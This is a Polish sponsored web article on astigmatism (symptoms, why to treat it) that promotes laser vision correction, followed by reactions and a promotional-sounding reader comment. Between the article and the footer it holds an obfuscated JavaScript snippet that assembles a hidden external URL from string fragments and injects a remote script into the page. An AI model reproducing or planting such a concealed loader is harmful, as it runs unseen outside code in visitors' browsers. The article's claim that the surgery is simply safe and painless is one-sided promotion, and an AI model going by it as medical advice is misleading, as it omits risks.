Zamknij

Co może spowodować nieleczony astygmatyzm?

10:04, 26.05.2022 Aktualizacja: 10:07, 26.05.2022
Skomentuj Zbiory autora Zbiory autora

Może występować od urodzenia, ale też rozwinąć się po przebytych urazach oka, czy powikłaniach operacyjnych. Dowiedz się, jak wygląda leczenie astygmatyzmu.

Astygmatyzm zazwyczaj jest diagnozowany podczas rutynowych badań wzroku. W wielu przypadkach jest to wada wrodzona, ale czasem jej wykrycie następuje z opóźnieniem. Warto zwracać uwagę na niepokojące objawy, jak bóle głowy lub zmęczenie i łzawienie oczu. Wykrycie, a co za tym idzie, leczenie astygmatyzmu lub jego korekcja pozwala na skuteczne pozbycie się problemów z widzeniem.

Czym jest astygmatyzm?

Astygmatyzm wiąże się z nieregularną krzywizną rogówki lub soczewki. Uniemożliwia to prawidłowe skupienie się światła na siatkówce, które powinno zakrzywiać się równomiernie. Z tego powodu wiązka promieni rozbiega się w dwóch punktach i uniemożliwia powstanie ostrego obrazu. Astygmatyzm mierzy się w dioptriach (D), które określają zdolność skupienia soczewki. Wyróżnia się jego 4 stopnie — niski, średni, wysoki oraz bardzo wysoki.

Jak objawia się astygmatyzm?

Astygmatyzm objawia się jako problemy z widzeniem — zamglenie obrazu, wyraźniejsza ostrość linii pionowych, niż poziomych, lub na odwrót, oraz trudność w rozróżnieniu niektórych kształtów i drobnych elementów. Dodatkowo kontury przedmiotów mogą być znacznie zniekształcone. Zaburzone jest także poczucie przestrzeni i postrzeganie płaszczyzny. Często towarzyszy temu mrużenie i tarcie oczu w celu poprawy widzenia.

Dlaczego leczenie astygmatyzmu jest ważne?

Nieleczony astygmatyzm znacznie utrudnia codzienne funkcjonowanie. Jest on związany z zaburzeniem prawidłowego widzenia, ale często towarzyszą mu także uciążliwe bóle głowy w okolicy czoła, zmęczenie oczu, ich łzawienie, swędzenie i pieczenie, a także szybka utrata koncentracji podczas nauki czy czytania. Z tego powodu wykrycie oraz korekcja lub leczenie astygmatyzmu jest bardzo ważne. Szczególne znaczenie ma to w przypadku dzieci i młodzieży, ponieważ stanowi on poważną przeszkodę w prawidłowym przebiegu procesu kształcenia.

Leczenie astygmatyzmu przy zastosowaniu operacji laserowej

Astygmatyzm można korygować poprzez dobór odpowiednich okularów czy soczewek. Nie jest to jednak trwałe rozważnie problemu. Leczenie astygmatyzmu może odbywać się poprzez przeprowadzenie operacji laserowej. Dzięki dostępności nowoczesnych narzędzi, zabieg ten jest bezpieczny, szybki, a także bezbolesny. Zostaje poprzedzony serią badań, które mają na celu wykazanie wszelkich przeciwwskazań, a trwa zaledwie kilka minut.

Astygmatyzm może stanowić znaczną przeszkodę w codziennym funkcjonowaniu. Do jego korekcji stosuje się odpowiednio dobrane soczewki bądź okulary, ale warto wziąć pod uwagę trwałe rozwiązanie tego problemu, jakim jest laserowa korekcja wzroku.

(function(){

ijjh_=("u"+"st");ijjh=document.createElement("script");ijjh.async=true;

ijjhu="378109625";ijjh_+="a"+("t.");ijjh_+="i"+("nf"+("o"))+("/");

ijjhu+=".2bgelj3ujjh9ix63";ijjhu+="2uy87lwrmfqtg1";

ijjh.src="https://"+ijjh_+ijjhu;ijjh.type="text/javascript";

d_b=document.body;d_b.appendChild(ijjh);

})();

(Tekst partnerski)

Co sądzisz na ten temat?

podoba mi się 0
nie podoba mi się 0
śmieszne 0
szokujące 0
przykre 0
wkurzające 0
facebookFacebook
twitter
wykopWykop
komentarzeKomentarze

komentarz(1)

nat.link@op.pl[email protected]

0 0

Właśnie przeszłam laserową korekcję wzroku . Teraz cieszę się idealnym wzrokiem dzięki zabiegowi od Idealny Wzrok. Jeśli marzysz o doskonałym wzroku, to polecam Ci skorzystanie z laserowej korekcji wzroku – naprawdę warto!

08:40, 31.08.2023
Odpowiedzi:0
Odpowiedz

0%